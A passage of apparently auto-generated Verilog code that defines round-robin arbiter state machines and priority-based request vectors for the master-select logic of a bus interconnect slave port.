                        s12_msel_arb0_next_state = s12_msel_arb0_grant5;
                    end
                    else
                    begin 
                        if ( s12_msel_arb0_req[6] ) 
                        begin
                            s12_msel_arb0_next_state = s12_msel_arb0_grant6;
                        end
                        else
                        begin 
                            if ( s12_msel_arb0_req[7] ) 
                            begin
                                s12_msel_arb0_next_state = s12_msel_arb0_grant7;
                            end
                            else
                            begin 
                                if ( s12_msel_arb0_req[0] ) 
                                begin
                                    s12_msel_arb0_next_state = s12_msel_arb0_grant0;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb0_req[1] ) 
                                    begin
                                        s12_msel_arb0_next_state = s12_msel_arb0_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb0_req[2] ) 
                                        begin
                                            s12_msel_arb0_next_state = s12_msel_arb0_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb0_grant4:
        begin
            if (  !( s12_msel_arb0_req[4]) | 1'b0 ) 
            begin
                if ( s12_msel_arb0_req[5] ) 
                begin
                    s12_msel_arb0_next_state = s12_msel_arb0_grant5;
                end
                else
                begin 
                    if ( s12_msel_arb0_req[6] ) 
                    begin
                        s12_msel_arb0_next_state = s12_msel_arb0_grant6;
                    end
                    else
                    begin 
                        if ( s12_msel_arb0_req[7] ) 
                        begin
                            s12_msel_arb0_next_state = s12_msel_arb0_grant7;
                        end
                        else
                        begin 
                            if ( s12_msel_arb0_req[0] ) 
                            begin
                                s12_msel_arb0_next_state = s12_msel_arb0_grant0;
                            end
                            else
                            begin 
                                if ( s12_msel_arb0_req[1] ) 
                                begin
                                    s12_msel_arb0_next_state = s12_msel_arb0_grant1;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb0_req[2] ) 
                                    begin
                                        s12_msel_arb0_next_state = s12_msel_arb0_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb0_req[3] ) 
                                        begin
                                            s12_msel_arb0_next_state = s12_msel_arb0_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb0_grant5:
        begin
            if (  !( s12_msel_arb0_req[5]) | 1'b0 ) 
            begin
                if ( s12_msel_arb0_req[6] ) 
                begin
                    s12_msel_arb0_next_state = s12_msel_arb0_grant6;
                end
                else
                begin 
                    if ( s12_msel_arb0_req[7] ) 
                    begin
                        s12_msel_arb0_next_state = s12_msel_arb0_grant7;
                    end
                    else
                    begin 
                        if ( s12_msel_arb0_req[0] ) 
                        begin
                            s12_msel_arb0_next_state = s12_msel_arb0_grant0;
                        end
                        else
                        begin 
                            if ( s12_msel_arb0_req[1] ) 
                            begin
                                s12_msel_arb0_next_state = s12_msel_arb0_grant1;
                            end
                            else
                            begin 
                                if ( s12_msel_arb0_req[2] ) 
                                begin
                                    s12_msel_arb0_next_state = s12_msel_arb0_grant2;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb0_req[3] ) 
                                    begin
                                        s12_msel_arb0_next_state = s12_msel_arb0_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb0_req[4] ) 
                                        begin
                                            s12_msel_arb0_next_state = s12_msel_arb0_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb0_grant6:
        begin
            if (  !( s12_msel_arb0_req[6]) | 1'b0 ) 
            begin
                if ( s12_msel_arb0_req[7] ) 
                begin
                    s12_msel_arb0_next_state = s12_msel_arb0_grant7;
                end
                else
                begin 
                    if ( s12_msel_arb0_req[0] ) 
                    begin
                        s12_msel_arb0_next_state = s12_msel_arb0_grant0;
                    end
                    else
                    begin 
                        if ( s12_msel_arb0_req[1] ) 
                        begin
                            s12_msel_arb0_next_state = s12_msel_arb0_grant1;
                        end
                        else
                        begin 
                            if ( s12_msel_arb0_req[2] ) 
                            begin
                                s12_msel_arb0_next_state = s12_msel_arb0_grant2;
                            end
                            else
                            begin 
                                if ( s12_msel_arb0_req[3] ) 
                                begin
                                    s12_msel_arb0_next_state = s12_msel_arb0_grant3;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb0_req[4] ) 
                                    begin
                                        s12_msel_arb0_next_state = s12_msel_arb0_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb0_req[5] ) 
                                        begin
                                            s12_msel_arb0_next_state = s12_msel_arb0_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb0_grant7:
        begin
            if (  !( s12_msel_arb0_req[7]) | 1'b0 ) 
            begin
                if ( s12_msel_arb0_req[0] ) 
                begin
                    s12_msel_arb0_next_state = s12_msel_arb0_grant0;
                end
                else
                begin 
                    if ( s12_msel_arb0_req[1] ) 
                    begin
                        s12_msel_arb0_next_state = s12_msel_arb0_grant1;
                    end
                    else
                    begin 
                        if ( s12_msel_arb0_req[2] ) 
                        begin
                            s12_msel_arb0_next_state = s12_msel_arb0_grant2;
                        end
                        else
                        begin 
                            if ( s12_msel_arb0_req[3] ) 
                            begin
                                s12_msel_arb0_next_state = s12_msel_arb0_grant3;
                            end
                            else
                            begin 
                                if ( s12_msel_arb0_req[4] ) 
                                begin
                                    s12_msel_arb0_next_state = s12_msel_arb0_grant4;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb0_req[5] ) 
                                    begin
                                        s12_msel_arb0_next_state = s12_msel_arb0_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb0_req[6] ) 
                                        begin
                                            s12_msel_arb0_next_state = s12_msel_arb0_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s12_msel_arb1_req = { ( s12_msel_req[7] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[15] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[14] ) ) } == 2'd1 ) ), ( s12_msel_req[6] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[13] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[12] ) ) } == 2'd1 ) ), ( s12_msel_req[5] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[11] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[10] ) ) } == 2'd1 ) ), ( s12_msel_req[4] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[9] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[8] ) ) } == 2'd1 ) ), ( s12_msel_req[3] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[7] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[6] ) ) } == 2'd1 ) ), ( s12_msel_req[2] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[5] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[4] ) ) } == 2'd1 ) ), ( s12_msel_req[1] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[3] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[2] ) ) } == 2'd1 ) ), ( s12_msel_req[0] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[1] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[0] ) ) } == 2'd1 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s12_msel_arb1_state <= s12_msel_arb1_grant0;
        end
        else
        begin 
            s12_msel_arb1_state <= s12_msel_arb1_next_state;
        end
    end
    always @ (  s12_msel_arb1_state or  { ( s12_msel_req[7] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[15] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[14] ) ) } == 2'd1 ) ), ( s12_msel_req[6] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[13] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[12] ) ) } == 2'd1 ) ), ( s12_msel_req[5] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[11] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[10] ) ) } == 2'd1 ) ), ( s12_msel_req[4] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[9] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[8] ) ) } == 2'd1 ) ), ( s12_msel_req[3] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[7] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[6] ) ) } == 2'd1 ) ), ( s12_msel_req[2] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[5] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[4] ) ) } == 2'd1 ) ), ( s12_msel_req[1] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[3] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[2] ) ) } == 2'd1 ) ), ( s12_msel_req[0] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[1] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[0] ) ) } == 2'd1 ) ) } or  1'b0)
    begin
        s12_msel_arb1_next_state = s12_msel_arb1_state;
        case ( s12_msel_arb1_state ) 
        s12_msel_arb1_grant0:
        begin
            if (  !( s12_msel_arb1_req[0]) | 1'b0 ) 
            begin
                if ( s12_msel_arb1_req[1] ) 
                begin
                    s12_msel_arb1_next_state = s12_msel_arb1_grant1;
                end
                else
                begin 
                    if ( s12_msel_arb1_req[2] ) 
                    begin
                        s12_msel_arb1_next_state = s12_msel_arb1_grant2;
                    end
                    else
                    begin 
                        if ( s12_msel_arb1_req[3] ) 
                        begin
                            s12_msel_arb1_next_state = s12_msel_arb1_grant3;
                        end
                        else
                        begin 
                            if ( s12_msel_arb1_req[4] ) 
                            begin
                                s12_msel_arb1_next_state = s12_msel_arb1_grant4;
                            end
                            else
                            begin 
                                if ( s12_msel_arb1_req[5] ) 
                                begin
                                    s12_msel_arb1_next_state = s12_msel_arb1_grant5;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb1_req[6] ) 
                                    begin
                                        s12_msel_arb1_next_state = s12_msel_arb1_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb1_req[7] ) 
                                        begin
                                            s12_msel_arb1_next_state = s12_msel_arb1_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb1_grant1:
        begin
            if (  !( s12_msel_arb1_req[1]) | 1'b0 ) 
            begin
                if ( s12_msel_arb1_req[2] ) 
                begin
                    s12_msel_arb1_next_state = s12_msel_arb1_grant2;
                end
                else
                begin 
                    if ( s12_msel_arb1_req[3] ) 
                    begin
                        s12_msel_arb1_next_state = s12_msel_arb1_grant3;
                    end
                    else
                    begin 
                        if ( s12_msel_arb1_req[4] ) 
                        begin
                            s12_msel_arb1_next_state = s12_msel_arb1_grant4;
                        end
                        else
                        begin 
                            if ( s12_msel_arb1_req[5] ) 
                            begin
                                s12_msel_arb1_next_state = s12_msel_arb1_grant5;
                            end
                            else
                            begin 
                                if ( s12_msel_arb1_req[6] ) 
                                begin
                                    s12_msel_arb1_next_state = s12_msel_arb1_grant6;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb1_req[7] ) 
                                    begin
                                        s12_msel_arb1_next_state = s12_msel_arb1_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb1_req[0] ) 
                                        begin
                                            s12_msel_arb1_next_state = s12_msel_arb1_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb1_grant2:
        begin
            if (  !( s12_msel_arb1_req[2]) | 1'b0 ) 
            begin
                if ( s12_msel_arb1_req[3] ) 
                begin
                    s12_msel_arb1_next_state = s12_msel_arb1_grant3;
                end
                else
                begin 
                    if ( s12_msel_arb1_req[4] ) 
                    begin
                        s12_msel_arb1_next_state = s12_msel_arb1_grant4;
                    end
                    else
                    begin 
                        if ( s12_msel_arb1_req[5] ) 
                        begin
                            s12_msel_arb1_next_state = s12_msel_arb1_grant5;
                        end
                        else
                        begin 
                            if ( s12_msel_arb1_req[6] ) 
                            begin
                                s12_msel_arb1_next_state = s12_msel_arb1_grant6;
                            end
                            else
                            begin 
                                if ( s12_msel_arb1_req[7] ) 
                                begin
                                    s12_msel_arb1_next_state = s12_msel_arb1_grant7;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb1_req[0] ) 
                                    begin
                                        s12_msel_arb1_next_state = s12_msel_arb1_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb1_req[1] ) 
                                        begin
                                            s12_msel_arb1_next_state = s12_msel_arb1_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb1_grant3:
        begin
            if (  !( s12_msel_arb1_req[3]) | 1'b0 ) 
            begin
                if ( s12_msel_arb1_req[4] ) 
                begin
                    s12_msel_arb1_next_state = s12_msel_arb1_grant4;
                end
                else
                begin 
                    if ( s12_msel_arb1_req[5] ) 
                    begin
                        s12_msel_arb1_next_state = s12_msel_arb1_grant5;
                    end
                    else
                    begin 
                        if ( s12_msel_arb1_req[6] ) 
                        begin
                            s12_msel_arb1_next_state = s12_msel_arb1_grant6;
                        end
                        else
                        begin 
                            if ( s12_msel_arb1_req[7] ) 
                            begin
                                s12_msel_arb1_next_state = s12_msel_arb1_grant7;
                            end
                            else
                            begin 
                                if ( s12_msel_arb1_req[0] ) 
                                begin
                                    s12_msel_arb1_next_state = s12_msel_arb1_grant0;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb1_req[1] ) 
                                    begin
                                        s12_msel_arb1_next_state = s12_msel_arb1_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb1_req[2] ) 
                                        begin
                                            s12_msel_arb1_next_state = s12_msel_arb1_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb1_grant4:
        begin
            if (  !( s12_msel_arb1_req[4]) | 1'b0 ) 
            begin
                if ( s12_msel_arb1_req[5] ) 
                begin
                    s12_msel_arb1_next_state = s12_msel_arb1_grant5;
                end
                else
                begin 
                    if ( s12_msel_arb1_req[6] ) 
                    begin
                        s12_msel_arb1_next_state = s12_msel_arb1_grant6;
                    end
                    else
                    begin 
                        if ( s12_msel_arb1_req[7] ) 
                        begin
                            s12_msel_arb1_next_state = s12_msel_arb1_grant7;
                        end
                        else
                        begin 
                            if ( s12_msel_arb1_req[0] ) 
                            begin
                                s12_msel_arb1_next_state = s12_msel_arb1_grant0;
                            end
                            else
                            begin 
                                if ( s12_msel_arb1_req[1] ) 
                                begin
                                    s12_msel_arb1_next_state = s12_msel_arb1_grant1;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb1_req[2] ) 
                                    begin
                                        s12_msel_arb1_next_state = s12_msel_arb1_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb1_req[3] ) 
                                        begin
                                            s12_msel_arb1_next_state = s12_msel_arb1_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb1_grant5:
        begin
            if (  !( s12_msel_arb1_req[5]) | 1'b0 ) 
            begin
                if ( s12_msel_arb1_req[6] ) 
                begin
                    s12_msel_arb1_next_state = s12_msel_arb1_grant6;
                end
                else
                begin 
                    if ( s12_msel_arb1_req[7] ) 
                    begin
                        s12_msel_arb1_next_state = s12_msel_arb1_grant7;
                    end
                    else
                    begin 
                        if ( s12_msel_arb1_req[0] ) 
                        begin
                            s12_msel_arb1_next_state = s12_msel_arb1_grant0;
                        end
                        else
                        begin 
                            if ( s12_msel_arb1_req[1] ) 
                            begin
                                s12_msel_arb1_next_state = s12_msel_arb1_grant1;
                            end
                            else
                            begin 
                                if ( s12_msel_arb1_req[2] ) 
                                begin
                                    s12_msel_arb1_next_state = s12_msel_arb1_grant2;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb1_req[3] ) 
                                    begin
                                        s12_msel_arb1_next_state = s12_msel_arb1_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb1_req[4] ) 
                                        begin
                                            s12_msel_arb1_next_state = s12_msel_arb1_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb1_grant6:
        begin
            if (  !( s12_msel_arb1_req[6]) | 1'b0 ) 
            begin
                if ( s12_msel_arb1_req[7] ) 
                begin
                    s12_msel_arb1_next_state = s12_msel_arb1_grant7;
                end
                else
                begin 
                    if ( s12_msel_arb1_req[0] ) 
                    begin
                        s12_msel_arb1_next_state = s12_msel_arb1_grant0;
                    end
                    else
                    begin 
                        if ( s12_msel_arb1_req[1] ) 
                        begin
                            s12_msel_arb1_next_state = s12_msel_arb1_grant1;
                        end
                        else
                        begin 
                            if ( s12_msel_arb1_req[2] ) 
                            begin
                                s12_msel_arb1_next_state = s12_msel_arb1_grant2;
                            end
                            else
                            begin 
                                if ( s12_msel_arb1_req[3] ) 
                                begin
                                    s12_msel_arb1_next_state = s12_msel_arb1_grant3;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb1_req[4] ) 
                                    begin
                                        s12_msel_arb1_next_state = s12_msel_arb1_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb1_req[5] ) 
                                        begin
                                            s12_msel_arb1_next_state = s12_msel_arb1_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb1_grant7:
        begin
            if (  !( s12_msel_arb1_req[7]) | 1'b0 ) 
            begin
                if ( s12_msel_arb1_req[0] ) 
                begin
                    s12_msel_arb1_next_state = s12_msel_arb1_grant0;
                end
                else
                begin 
                    if ( s12_msel_arb1_req[1] ) 
                    begin
                        s12_msel_arb1_next_state = s12_msel_arb1_grant1;
                    end
                    else
                    begin 
                        if ( s12_msel_arb1_req[2] ) 
                        begin
                            s12_msel_arb1_next_state = s12_msel_arb1_grant2;
                        end
                        else
                        begin 
                            if ( s12_msel_arb1_req[3] ) 
                            begin
                                s12_msel_arb1_next_state = s12_msel_arb1_grant3;
                            end
                            else
                            begin 
                                if ( s12_msel_arb1_req[4] ) 
                                begin
                                    s12_msel_arb1_next_state = s12_msel_arb1_grant4;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb1_req[5] ) 
                                    begin
                                        s12_msel_arb1_next_state = s12_msel_arb1_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb1_req[6] ) 
                                        begin
                                            s12_msel_arb1_next_state = s12_msel_arb1_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s12_msel_arb2_req = { ( s12_msel_req[7] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[15] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[14] ) ) } == 2'd2 ) ), ( s12_msel_req[6] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[13] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[12] ) ) } == 2'd2 ) ), ( s12_msel_req[5] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[11] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[10] ) ) } == 2'd2 ) ), ( s12_msel_req[4] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[9] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[8] ) ) } == 2'd2 ) ), ( s12_msel_req[3] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[7] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[6] ) ) } == 2'd2 ) ), ( s12_msel_req[2] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[5] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[4] ) ) } == 2'd2 ) ), ( s12_msel_req[1] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[3] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[2] ) ) } == 2'd2 ) ), ( s12_msel_req[0] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[1] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[0] ) ) } == 2'd2 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s12_msel_arb2_state <= s12_msel_arb2_grant0;
        end
        else
        begin 
            s12_msel_arb2_state <= s12_msel_arb2_next_state;
        end
    end
    always @ (  s12_msel_arb2_state or  { ( s12_msel_req[7] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[15] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[14] ) ) } == 2'd2 ) ), ( s12_msel_req[6] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[13] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[12] ) ) } == 2'd2 ) ), ( s12_msel_req[5] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[11] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[10] ) ) } == 2'd2 ) ), ( s12_msel_req[4] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[9] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[8] ) ) } == 2'd2 ) ), ( s12_msel_req[3] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[7] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[6] ) ) } == 2'd2 ) ), ( s12_msel_req[2] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[5] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[4] ) ) } == 2'd2 ) ), ( s12_msel_req[1] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[3] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[2] ) ) } == 2'd2 ) ), ( s12_msel_req[0] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[1] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[0] ) ) } == 2'd2 ) ) } or  1'b0)
    begin
        s12_msel_arb2_next_state = s12_msel_arb2_state;
        case ( s12_msel_arb2_state ) 
        s12_msel_arb2_grant0:
        begin
            if (  !( s12_msel_arb2_req[0]) | 1'b0 ) 
            begin
                if ( s12_msel_arb2_req[1] ) 
                begin
                    s12_msel_arb2_next_state = s12_msel_arb2_grant1;
                end
                else
                begin 
                    if ( s12_msel_arb2_req[2] ) 
                    begin
                        s12_msel_arb2_next_state = s12_msel_arb2_grant2;
                    end
                    else
                    begin 
                        if ( s12_msel_arb2_req[3] ) 
                        begin
                            s12_msel_arb2_next_state = s12_msel_arb2_grant3;
                        end
                        else
                        begin 
                            if ( s12_msel_arb2_req[4] ) 
                            begin
                                s12_msel_arb2_next_state = s12_msel_arb2_grant4;
                            end
                            else
                            begin 
                                if ( s12_msel_arb2_req[5] ) 
                                begin
                                    s12_msel_arb2_next_state = s12_msel_arb2_grant5;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb2_req[6] ) 
                                    begin
                                        s12_msel_arb2_next_state = s12_msel_arb2_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb2_req[7] ) 
                                        begin
                                            s12_msel_arb2_next_state = s12_msel_arb2_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb2_grant1:
        begin
            if (  !( s12_msel_arb2_req[1]) | 1'b0 ) 
            begin
                if ( s12_msel_arb2_req[2] ) 
                begin
                    s12_msel_arb2_next_state = s12_msel_arb2_grant2;
                end
                else
                begin 
                    if ( s12_msel_arb2_req[3] ) 
                    begin
                        s12_msel_arb2_next_state = s12_msel_arb2_grant3;
                    end
                    else
                    begin 
                        if ( s12_msel_arb2_req[4] ) 
                        begin
                            s12_msel_arb2_next_state = s12_msel_arb2_grant4;
                        end
                        else
                        begin 
                            if ( s12_msel_arb2_req[5] ) 
                            begin
                                s12_msel_arb2_next_state = s12_msel_arb2_grant5;
                            end
                            else
                            begin 
                                if ( s12_msel_arb2_req[6] ) 
                                begin
                                    s12_msel_arb2_next_state = s12_msel_arb2_grant6;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb2_req[7] ) 
                                    begin
                                        s12_msel_arb2_next_state = s12_msel_arb2_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb2_req[0] ) 
                                        begin
                                            s12_msel_arb2_next_state = s12_msel_arb2_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb2_grant2:
        begin
            if (  !( s12_msel_arb2_req[2]) | 1'b0 ) 
            begin
                if ( s12_msel_arb2_req[3] ) 
                begin
                    s12_msel_arb2_next_state = s12_msel_arb2_grant3;
                end
                else
                begin 
                    if ( s12_msel_arb2_req[4] ) 
                    begin
                        s12_msel_arb2_next_state = s12_msel_arb2_grant4;
                    end
                    else
                    begin 
                        if ( s12_msel_arb2_req[5] ) 
                        begin
                            s12_msel_arb2_next_state = s12_msel_arb2_grant5;
                        end
                        else
                        begin 
                            if ( s12_msel_arb2_req[6] ) 
                            begin
                                s12_msel_arb2_next_state = s12_msel_arb2_grant6;
                            end
                            else
                            begin 
                                if ( s12_msel_arb2_req[7] ) 
                                begin
                                    s12_msel_arb2_next_state = s12_msel_arb2_grant7;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb2_req[0] ) 
                                    begin
                                        s12_msel_arb2_next_state = s12_msel_arb2_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb2_req[1] ) 
                                        begin
                                            s12_msel_arb2_next_state = s12_msel_arb2_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb2_grant3:
        begin
            if (  !( s12_msel_arb2_req[3]) | 1'b0 ) 
            begin
                if ( s12_msel_arb2_req[4] ) 
                begin
                    s12_msel_arb2_next_state = s12_msel_arb2_grant4;
                end
                else
                begin 
                    if ( s12_msel_arb2_req[5] ) 
                    begin
                        s12_msel_arb2_next_state = s12_msel_arb2_grant5;
                    end
                    else
                    begin 
                        if ( s12_msel_arb2_req[6] ) 
                        begin
                            s12_msel_arb2_next_state = s12_msel_arb2_grant6;
                        end
                        else
                        begin 
                            if ( s12_msel_arb2_req[7] ) 
                            begin
                                s12_msel_arb2_next_state = s12_msel_arb2_grant7;
                            end
                            else
                            begin 
                                if ( s12_msel_arb2_req[0] ) 
                                begin
                                    s12_msel_arb2_next_state = s12_msel_arb2_grant0;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb2_req[1] ) 
                                    begin
                                        s12_msel_arb2_next_state = s12_msel_arb2_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb2_req[2] ) 
                                        begin
                                            s12_msel_arb2_next_state = s12_msel_arb2_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb2_grant4:
        begin
            if (  !( s12_msel_arb2_req[4]) | 1'b0 ) 
            begin
                if ( s12_msel_arb2_req[5] ) 
                begin
                    s12_msel_arb2_next_state = s12_msel_arb2_grant5;
                end
                else
                begin 
